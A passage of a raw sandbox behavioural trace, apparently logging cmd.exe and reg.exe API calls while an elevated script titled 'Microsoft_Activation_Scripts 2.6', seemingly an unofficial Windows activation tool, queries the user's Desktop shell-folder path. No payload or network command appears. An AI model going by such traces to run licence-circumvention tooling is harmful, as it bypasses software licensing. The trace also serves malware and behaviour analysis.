RtlReAllocateHeap (Heap=0x2303ec30000, Flags=0x0, Ptr=0x2303ec371b0, Size=0x88) returned 0x2303ec371b0 [0179.824] GetProcessHeap () returned 0x2303ec30000 [0179.824] RtlSizeHeap (HeapHandle=0x2303ec30000, Flags=0x0, MemoryPointer=0x2303ec371b0) returned 0x88 [0179.824] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0179.825] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\reg.*" (normalized: "c:\\windows\\system32\\reg.*"), fInfoLevelId=0x1, lpFindFileData=0x87a635ef70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x87a635ef70) returned 0x2303ec37250 [0179.825] GetProcessHeap () returned 0x2303ec30000 [0179.825] RtlAllocateHeap (HeapHandle=0x2303ec30000, Flags=0x0, Size=0x28) returned 0x2303ec38de0 [0179.825] FindClose (in: hFindFile=0x2303ec37250 | out: hFindFile=0x2303ec37250) returned 1 [0179.825] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\reg.COM" (normalized: "c:\\windows\\system32\\reg.com"), fInfoLevelId=0x1, lpFindFileData=0x87a635ef70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x87a635ef70) returned 0xffffffffffffffff [0179.825] GetLastError () returned 0x2 [0179.825] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\reg.EXE" (normalized: "c:\\windows\\system32\\reg.exe"), fInfoLevelId=0x1, lpFindFileData=0x87a635ef70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x87a635ef70) returned 0x2303ec37250 [0179.826] GetProcessHeap () returned 0x2303ec30000 [0179.826] RtlReAllocateHeap (Heap=0x2303ec30000, Flags=0x0, Ptr=0x2303ec38de0, Size=0x8) returned 0x2303ec38de0 [0179.826] FindClose (in: hFindFile=0x2303ec37250 | out: hFindFile=0x2303ec37250) returned 1 [0179.826] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0179.826] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0179.826] GetConsoleTitleW (in: lpConsoleTitle=0x87a635f4d0, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0179.826] InitializeProcThreadAttributeList (in: lpAttributeList=0x87a635f3f0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x87a635f2f0 | out: lpAttributeList=0x87a635f3f0, lpSize=0x87a635f2f0) returned 1 [0179.826] UpdateProcThreadAttribute (in: lpAttributeList=0x87a635f3f0, dwFlags=0x0, Attribute=0x60001, lpValue=0x87a635f2dc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x87a635f3f0, lpPreviousValue=0x0) returned 1 [0179.826] GetStartupInfoW (in: lpStartupInfo=0x87a635f380 | out: lpStartupInfo=0x87a635f380*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x20, hStdOutput=0x84, hStdError=0x28)) [0179.827] GetProcessHeap () returned 0x2303ec30000 [0179.827] RtlAllocateHeap (HeapHandle=0x2303ec30000, Flags=0x8, Size=0x20) returned 0x2303ec37250 [0179.827] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0179.827] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0179.827] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0179.827] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0179.827] _wcsnicmp (_String1="COPYCMD", _String2="Black=\"", _MaxCount=0x7) returned 1 [0179.827] _wcsnicmp (_String1="COPYCMD", _String2="Blue=\"4", _MaxCount=0x7) returned 1 [0179.827] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0179.827] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0179.827] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0179.827] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0179.827] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0179.827] _wcsnicmp (_String1="COPYCMD", _String2="eline=e", _MaxCount=0x7) returned -2 [0179.827] _wcsnicmp (_String1="COPYCMD", _String2="esc=\x1b", _MaxCount=0x7) returned -2 [0179.827] _wcsnicmp (_String1="COPYCMD", _String2="Gray=\"1", _MaxCount=0x7) returned -4 [0179.827] _wcsnicmp (_String1="COPYCMD", _String2="Green=\"", _MaxCount=0x7) returned -4 [0179.827] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0179.827] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0179.827] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0179.827] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0179.827] _wcsnicmp (_String1="COPYCMD", _String2="Magenta", _MaxCount=0x7) returned -10 [0179.827] _wcsnicmp (_String1="COPYCMD", _String2="mas=htt", _MaxCount=0x7) returned -10 [0179.827] _wcsnicmp (_String1="COPYCMD", _String2="masver=", _MaxCount=0x7) returned -10 [0179.827] _wcsnicmp (_String1="COPYCMD", _String2="nceline", _MaxCount=0x7) returned -11 [0179.827] _wcsnicmp (_String1="COPYCMD", _String2="nul=>nu", _MaxCount=0x7) returned -11 [0179.827] _wcsnicmp (_String1="COPYCMD", _String2="nul1=1>", _MaxCount=0x7) returned -11 [0179.828] _wcsnicmp (_String1="COPYCMD", _String2="nul2=2>", _MaxCount=0x7) returned -11 [0179.828] _wcsnicmp (_String1="COPYCMD", _String2="nul6=2^", _MaxCount=0x7) returned -11 [0179.828] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0179.828] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0179.828] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0179.828] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0179.828] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0179.828] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0179.828] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0179.828] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0179.828] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0179.828] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0179.828] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0179.828] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0179.828] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0179.828] _wcsnicmp (_String1="COPYCMD", _String2="psc=pow", _MaxCount=0x7) returned -13 [0179.828] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0179.828] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0179.828] _wcsnicmp (_String1="COPYCMD", _String2="Red=\"41", _MaxCount=0x7) returned -15 [0179.828] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0179.828] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0179.828] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0179.828] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0179.828] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0179.828] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0179.828] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0179.828] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0179.828] _wcsnicmp (_String1="COPYCMD", _String2="winbuil", _MaxCount=0x7) returned -20 [0179.828] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0179.828] _wcsnicmp (_String1="COPYCMD", _String2="Yellow=", _MaxCount=0x7) returned -22 [0179.829] _wcsnicmp (_String1="COPYCMD", _String2="_batf=C", _MaxCount=0x7) returned 4 [0179.829] _wcsnicmp (_String1="COPYCMD", _String2="_batp=C", _MaxCount=0x7) returned 4 [0179.829] _wcsnicmp (_String1="COPYCMD", _String2="_Blue=\"", _MaxCount=0x7) returned 4 [0179.829] _wcsnicmp (_String1="COPYCMD", _String2="_cmdf=C", _MaxCount=0x7) returned 4 [0179.829] _wcsnicmp (_String1="COPYCMD", _String2="_Green=", _MaxCount=0x7) returned 4 [0179.829] _wcsnicmp (_String1="COPYCMD", _String2="_NCS=1", _MaxCount=0x7) returned 4 [0179.829] _wcsnicmp (_String1="COPYCMD", _String2="_PSarg=", _MaxCount=0x7) returned 4 [0179.829] _wcsnicmp (_String1="COPYCMD", _String2="_Red=\"4", _MaxCount=0x7) returned 4 [0179.829] _wcsnicmp (_String1="COPYCMD", _String2="_ttemp=", _MaxCount=0x7) returned 4 [0179.829] _wcsnicmp (_String1="COPYCMD", _String2="_White=", _MaxCount=0x7) returned 4 [0179.829] _wcsnicmp (_String1="COPYCMD", _String2="_work=C", _MaxCount=0x7) returned 4 [0179.829] _wcsnicmp (_String1="COPYCMD", _String2="_Yellow", _MaxCount=0x7) returned 4 [0179.829] GetProcessHeap () returned 0x2303ec30000 [0179.829] RtlFreeHeap (HeapHandle=0x2303ec30000, Flags=0x0, BaseAddress=0x2303ec37250) returned 1 [0179.830] GetProcessHeap () returned 0x2303ec30000 [0179.830] RtlAllocateHeap (HeapHandle=0x2303ec30000, Flags=0x8, Size=0x12) returned 0x2303ec38e00 [0179.830] lstrcmpW (lpString1="\\reg.exe", lpString2="\\XCOPY.EXE") returned -1 [0179.833] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\reg.exe", lpCommandLine="reg query \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\" /v Desktop", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\System32", lpStartupInfo=0x87a635f310*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="reg query \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\" /v Desktop", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x87a635f2f8 | out: lpCommandLine="reg query \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\" /v Desktop", lpProcessInformation=0x87a635f2f8*(hProcess=0x90, hThread=0x8c, dwProcessId=0xed4, dwThreadId=0x778)) returned 1 [0179.841] CloseHandle (hObject=0x8c) returned 1 [0179.841] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0179.841] GetProcessHeap () returned 0x2303ec30000 [0179.841] RtlFreeHeap (HeapHandle=0x2303ec30000, Flags=0x0, BaseAddress=0x2303ec3b2e0) returned 1 [0179.842] GetEnvironmentStringsW () returned 0x2303ec3b2e0* [0179.842] GetProcessHeap () returned 0x2303ec30000 [0179.842] RtlAllocateHeap (HeapHandle=0x2303ec30000, Flags=0x8, Size=0xfbe) returned 0x2303ec3c2b0 [0179.842] memcpy (in: _Dst=0x2303ec3c2b0, _Src=0x2303ec3b2e0, _Size=0xfbe | out: _Dst=0x2303ec3c2b0) returned 0x2303ec3c2b0 [0179.842] FreeEnvironmentStringsA (penv="=") returned 1 [0179.842] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0xffffffff) returned 0x0 [0180.072] GetExitCodeProcess (in: hProcess=0x90, lpExitCode=0x87a635f278 | out: lpExitCode=0x87a635f278*=0x0) returned 1 [0180.072] CloseHandle (hObject=0x90) returned 1 [0180.072] _vsnwprintf (in: _Buffer=0x87a635f438, _BufferCount=0x13, _Format="%08X", _ArgList=0x87a635f288 | out: _Buffer="00000000") returned 8 [0180.072] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0180.072] GetProcessHeap () returned 0x2303ec30000 [0180.073] RtlFreeHeap (HeapHandle=0x2303ec30000, Flags=0x0, BaseAddress=0x2303ec3c2b0) returned 1 [0180.073] GetEnvironmentStringsW () returned 0x2303ec3b2e0* [0180.073] GetProcessHeap () returned 0x2303ec30000 [0180.073] RtlAllocateHeap (HeapHandle=0x2303ec30000, Flags=0x8, Size=0xfbe) returned 0x2303ec3c2b0 [0180.073] memcpy (in: _Dst=0x2303ec3c2b0, _Src=0x2303ec3b2e0, _Size=0xfbe | out: _Dst=0x2303ec3c2b0) returned 0x2303ec3c2b0 [0180.073] FreeEnvironmentStringsA (penv="=") returned 1 [0180.073] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0180.073] GetProcessHeap () returned 0x2303ec30000 [0180.074] RtlFreeHeap (HeapHandle=0x2303ec30000, Flags=0x0, BaseAddress=0x2303ec3c2b0) returned 1 [0180.074] GetEnvironmentStringsW () returned 0x2303ec3b2e0* [0180.074] GetProcessHeap () returned 0x2303ec30000 [0180.074] RtlAllocateHeap (HeapHandle=0x2303ec30000, Flags=0x8, Size=0xfbe) returned 0x2303ec3c2b0 [0180.074] memcpy (in: _Dst=0x2303ec3c2b0, _Src=0x2303ec3b2e0, _Size=0xfbe | out: _Dst=0x2303ec3c2b0) returned 0x2303ec3c2b0 [0180.074] FreeEnvironmentStringsA (penv="=") returned 1 [0180.074] GetProcessHeap () returned 0x2303ec30000 [0180.074] RtlFreeHeap (HeapHandle=0x2303ec30000, Flags=0x0, BaseAddress=0x2303ec38e00) returned 1 [0180.074] DeleteProcThreadAttributeList (in: lpAttributeList=0x87a635f3f0 | out: lpAttributeList=0x87a635f3f0) [0180.074] _get_osfhandle (_FileHandle=1) returned 0x84 [0180.074] SetConsoleMode (hConsoleHandle=0x84, dwMode=0x0) returned 0 [0180.074] _get_osfhandle (_FileHandle=1) returned 0x84 [0180.074] GetConsoleMode (in: hConsoleHandle=0x84, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 0 [0180.074] _get_osfhandle (_FileHandle=0) returned 0x20 [0180.074] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0180.075] SetConsoleInputExeNameW () returned 0x1 [0180.075] GetConsoleOutputCP () returned 0x1b5 [0180.075] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0180.075] SetThreadUILanguage (LangId=0x0) returned 0x409 [0180.076] exit (_Code=0) Thread: id = 86 os_tid = 0xed0 Process: id = "26" image_name = "reg.exe" filename = "c:\\windows\\system32\\reg.exe" page_root = "0x602f4000" os_pid = "0xed4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "25" os_parent_pid = "0xeb8" cmd_line = "reg query \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\" /v Desktop" cur_dir = "C:\\Windows\\System32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ff75" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1572 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1573 start_va = 0x7b54280000 end_va = 0x7b542fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000007b54280000" filename = "" Region: id = 1574 start_va = 0x7b54400000 end_va = 0x7b545fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000007b54400000" filename = "" Region: id = 1575 start_va = 0x21403fd0000 end_va = 0x21403feffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000021403fd0000" filename = "" Region: id = 1576 start_va = 0x21403ff0000 end_va = 0x21404004fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000021403ff0000" filename = "" Region: id = 1577 start_va = 0x21404010000 end_va = 0x21404013fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000021404010000" filename = "" Region: id = 1578 start_va = 0x21404020000 end_va = 0x21404020fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000021404020000" filename = "" Region: id = 1579 start_va = 0x21404030000 end_va = 0x21404031fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000021404030000" filename = "" Region: id = 1580 start_va = 0x7df5ffb90000 end_va = 0x7ff5ffb8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffb90000" filename = "" Region: id = 1581 start_va = 0x7ff7b6580000 end_va = 0x7ff7b65a2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7b6580000" filename = "" Region: id = 1582 start_va = 0x7ff7b7500000 end_va = 0x7ff7b7555fff monitored = 1 entry_point = 0x7ff7b750e200 region_type = mapped_file name = "reg.exe" filename = "\\Windows\\System32\\reg.exe" (normalized: "c:\\windows\\system32\\reg.exe") Region: id = 1583 start_va = 0x7ffbed960000 end_va = 0x7ffbedb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1584 start_va = 0x21404040000 end_va = 0x2140417ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000021404040000" filename = "" Region: id = 1585 start_va = 0x7ffbed570000 end_va = 0x7ffbed61cfff monitored = 0 entry_point = 0x7ffbed5881a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1586 start_va = 0x7ffbea3c0000 end_va = 0x7ffbea5a7fff monitored = 0 entry_point = 0x7ffbea3eba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1587 start_va = 0x21403fd0000 end_va = 0x21403fdffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000021403fd0000" filename = "" Region: id = 1588 start_va = 0x7ff7b6480000 end_va = 0x7ff7b657ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7b6480000" filename = "" Region: id = 1589 start_va = 0x21404180000 end_va = 0x2140423dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1590 start_va = 0x7ffbed880000 end_va = 0x7ffbed91cfff monitored = 0 entry_point = 0x7ffbed8878a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1591 start_va = 0x7b54300000 end_va = 0x7b5437ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000007b54300000" filename = "" Region: id = 1592 start_va = 0x7ffbeaff0000 end_va = 0x7ffbeb096fff monitored = 0 entry_point = 0x7ffbeb0058d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1593 start_va = 0x7ffbed0e0000 end_va = 0x7ffbed13afff monitored = 0 entry_point = 0x7ffbed0f38b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1594 start_va = 0x7ffbed620000 end_va = 0x7ffbed73bfff monitored = 0 entry_point = 0x7ffbed6602b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1595 start_va = 0x7ffbed7a0000 end_va = 0x7ffbed80afff monitored = 0 entry_point = 0x7ffbed7b90c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1596 start_va = 0x21404240000 end_va = 0x2140430ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000021404240000" filename = "" Region: id = 1597 start_va = 0x21403fe0000 end_va = 0x21403fe6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000021403fe0000" filename = "" Region: id = 1598 start_va = 0x21404310000 end_va = 0x21404646fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1599 start_va = 0x21404040000 end_va = 0x21404046fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000021404040000" filename = "" Region: id = 1600 start_va = 0x21404080000 end_va = 0x2140417ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000021404080000" filename = "" Thread: id = 87 os_tid = 0x778 [0179.895] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff7b7500000 [0179.895] __set_app_type (_Type=0x1) [0179.895] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff7b750e510) returned 0x0 [0179.895] __wgetmainargs (in: _Argc=0x7ff7b7512048, _Argv=0x7ff7b7512050, _Env=0x7ff7b7512058, _DoWildCard=0, _StartInfo=0x7ff7b7512064 | out: _Argc=0x7ff7b7512048, _Argv=0x7ff7b7512050, _Env=0x7ff7b7512058) returned 0 [0179.895] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="query", cchCount1=-1, lpString2="QUERY", cchCount2=-1) returned 2 [0179.897] RegOpenKeyW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", phkResult=0x7b542ffa68 | out: phkResult=0x7b542ffa68*=0x0) returned 0x2 [0179.898] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="query", cchCount1=-1, lpString2="QUERY", cchCount2=-1) returned 2 [0179.898] lstrlenW (lpString="/?|-?|/h|-h") returned 11 [0179.898] GetProcessHeap () returned 0x21404080000 [0179.898] RtlAllocateHeap (HeapHandle=0x21404080000, Flags=0xc, Size=0x18) returned 0x214040851f0 [0179.898] lstrlenW (lpString="") returned 0 [0179.898] GetProcessHeap () returned 0x21404080000 [0179.898] RtlAllocateHeap (HeapHandle=0x21404080000, Flags=0xc, Size=0x2) returned 0x21404085210 [0179.898] GetProcessHeap () returned 0x21404080000 [0179.898] RtlAllocateHeap (HeapHandle=0x21404080000, Flags=0xc, Size=0x20) returned 0x21404084dc0 [0179.898] GetProcessHeap () returned 0x21404080000 [0179.898] RtlAllocateHeap (HeapHandle=0x21404080000, Flags=0xc, Size=0x18) returned 0x21404085230 [0179.898] GetProcessHeap () returned 0x21404080000 [0179.898] RtlAllocateHeap (HeapHandle=0x21404080000, Flags=0xc, Size=0x20) returned 0x21404084df0 [0179.898] GetProcessHeap () returned 0x21404080000 [0179.898] RtlAllocateHeap (HeapHandle=0x21404080000, Flags=0xc, Size=0x20) returned 0x21404084e20 [0179.899] GetProcessHeap () returned 0x21404080000 [0179.899] RtlAllocateHeap (HeapHandle=0x21404080000, Flags=0xc, Size=0x20) returned 0x21404088f50 [0179.899] GetProcessHeap () returned 0x21404080000 [0179.899] RtlAllocateHeap (HeapHandle=0x21404080000, Flags=0xc, Size=0x20) returned 0x21404089070 [0179.899] GetProcessHeap () returned 0x21404080000 [0179.899] RtlAllocateHeap (HeapHandle=0x21404080000, Flags=0xc, Size=0x18) returned 0x21404084e50 [0179.899] GetProcessHeap () returned 0x21404080000 [0179.899] RtlAllocateHeap (HeapHandle=0x21404080000, Flags=0xc, Size=0x20) returned 0x21404088f80 [0179.899] GetProcessHeap () returned 0x21404080000 [0179.899] RtlAllocateHeap (HeapHandle=0x21404080000, Flags=0xc, Size=0x20) returned 0x21404088fb0 [0179.899] GetProcessHeap () returned 0x21404080000 [0179.899] RtlAllocateHeap (HeapHandle=0x21404080000, Flags=0xc, Size=0x20) returned 0x21404089190 [0179.899] GetProcessHeap () returned 0x21404080000 [0179.899] RtlAllocateHeap (HeapHandle=0x21404080000, Flags=0xc, Size=0x20) returned 0x214040891f0 [0179.899] GetProcessHeap () returned 0x21404080000 [0179.899] RtlAllocateHeap (HeapHandle=0x21404080000, Flags=0xc, Size=0x18) returned 0x21404084cd0 [0179.899] GetProcessHeap () returned 0x21404080000 [0179.899] RtlAllocateHeap (HeapHandle=0x21404080000, Flags=0xc, Size=0x20) returned 0x214040891c0 [0179.899] GetProcessHeap () returned 0x21404080000 [0179.899] RtlAllocateHeap (HeapHandle=0x21404080000, Flags=0xc, Size=0x20) returned 0x21404089010 [0179.899] GetProcessHeap () returned 0x21404080000 [0179.899] RtlAllocateHeap (HeapHandle=0x21404080000, Flags=0xc, Size=0x20) returned 0x21404088fe0 [0179.899] GetProcessHeap () returned 0x21404080000 [0179.899] RtlAllocateHeap (HeapHandle=0x21404080000, Flags=0xc, Size=0x20) returned 0x21404089040 [0179.899] SetThreadUILanguage (LangId=0x0) returned 0x409 [0179.902] GetProcessHeap () returned 0x21404080000 [0179.902] RtlAllocateHeap (HeapHandle=0x21404080000, Flags=0xc, Size=0x18) returned 0x21404084a20 [0179.902] _memicmp (_Buf1=0x21404084a20, _Buf2=0x7ff7b75100d8, _Size=0x7) returned 0 [0179.902] GetProcessHeap () returned 0x21404080000 [0179.902] RtlAllocateHeap (HeapHandle=0x21404080000, Flags=0xc, Size=0x1e) returned 0x21404089220 [0179.902] lstrlenW (lpString="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 74 [0179.902] GetProcessHeap () returned 0x21404080000 [0179.902] RtlAllocateHeap (HeapHandle=0x21404080000, Flags=0xc, Size=0x18) returned 0x21404084a40 [0179.902] _memicmp (_Buf1=0x21404084a40, _Buf2=0x7ff7b75100d8, _Size=0x7) returned 0 [0179.902] GetProcessHeap () returned 0x21404080000 [0179.902] RtlAllocateHeap (HeapHandle=0x21404080000, Flags=0xc, Size=0x9c) returned 0x214040848e0 [0179.902] _vsnwprintf (in: _Buffer=0x21404089220, _BufferCount=0xe, _Format="|%s|", _ArgList=0x7b542ff8e8 | out: _Buffer="|/?|-?|/h|-h|") returned 13 [0179.902] _vsnwprintf (in: _Buffer=0x214040848e0, _BufferCount=0x4d, _Format="|%s|", _ArgList=0x7b542ff8e8 | out: _Buffer="|HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders|") returned 76 [0179.902] lstrlenW (lpString="|/?|-?|/h|-h|") returned 13 [0179.902] lstrlenW (lpString="|HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders|") returned 76 [0179.902] RtlRestoreLastWin32Error () returned 0x7b545bc000 [0179.902] lstrlenW (lpString="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 74 [0179.903] GetProcessHeap () returned 0x21404080000 [0179.903] RtlAllocateHeap (HeapHandle=0x21404080000, Flags=0xc, Size=0x96) returned 0x21404084a60 [0179.903] lstrlenW (lpString="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 74 [0179.903] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0179.903] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0179.903] StrChrW (lpStart=" \x09", wMatch=0x4b) returned 0x0 [0179.903] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0179.903] StrChrW (lpStart=" \x09", wMatch=0x55) returned 